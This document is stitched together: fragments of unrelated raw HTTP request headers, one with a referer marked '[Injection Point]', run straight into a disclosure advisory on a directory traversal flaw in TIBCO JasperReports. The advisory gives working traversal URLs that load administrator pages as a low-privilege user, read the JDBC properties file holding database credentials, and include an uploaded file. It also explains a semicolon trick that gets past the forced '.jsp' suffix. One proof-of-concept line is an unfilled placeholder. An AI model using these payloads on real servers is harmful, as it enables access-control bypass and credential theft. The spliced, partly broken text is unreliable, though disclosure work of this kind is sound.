Accept-Encoding: gzip, deflate
Referer: http://localhost/news.php?id=[Injection Point]
Connection: keep-alive
GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/news.php?id=[Injection Point]
TIBCO’s JasperReports (<=6.2.4, 6.3.0, 6.3.2-3, 6.4.0, 6.4.2, CE/ActiveMatrix BPM and Jaspersoft AWS with Multi-Tenancy/Reporting and Analytics for AWS <=6.4.2) is vulnerable to an authenticated file read and inclusion vulnerability by means of directory traversal. It is possible for an attacker, regardless of user permissions, to access or include files from within the filesystem hosting the application.
CVSS v3 Base Score: 7.7 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
- - -
## Bypassing JasperReports Access Controls
The following example allowed us to include an administrator JSP from a low privileged user (joeuser):
/jasperserver/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/adminImport
Which took us from:
getAttribute() @ HttpServletRequestParameterMap.java:57
> string[] = wrapper.getParameterValues("page")
To:
getResource() @ DirResourceSet.java:101
> file = new File(/home/rhino/jasperreports...mcat/webapps/jasperserver,"/WEB-INF/jsp/modules/administer/adminImport.jsp")
Due to a lack of input validation we found ourselves with the capability to traverse paths to a destination of our choice. Below you will find more Proof of Concepts (PoCs) of the the attack in question:
## Accessing Administrator Export Functions
/jasperserver-pro/___________?{param}=..
## Accessing AWS Configuration Functions
/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/awsConfiguration
The above issue allowed us to load privileged portions of the application geared towards the Administrator, thus bypassing access controls.
## Local File Read
The following command allowed us to read configuration files on the server, taking advantage of an unsanitized ‘page’ perimeter and reading configuration files. An attacker would use these credentials to further pivot across application and services. Although the above screenshot provides a randomly generated password for the occasion, we decided to blur it out of habit.
/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../js.jdbc.properties;
## Local File Inclusion (JSP)
And in the event of a post-intrusion scenario, an attacker would need to upload an arbitrary JSP file, masqueraded as a regular file (sans .jsp) to the victims filesystem and execute something like the following via a local file inclusion:
/jasperserver-pro/flow.html?_flowId=sampleFlow&page=../../../jsp/modules/administer/file;
NOTE: Since the application appends ‘.jsp’ to the ‘page’ paramater value, normally you would end up with ../../../jsp/modules/administer/file.jsp. However, if we want to read configuration files we need to trick Java to read our desired file, and ignore the ‘.jsp’ addition. NULL bytes (%00) do not work, however we were able to bypass the problem by adding a semicolon to our desired file.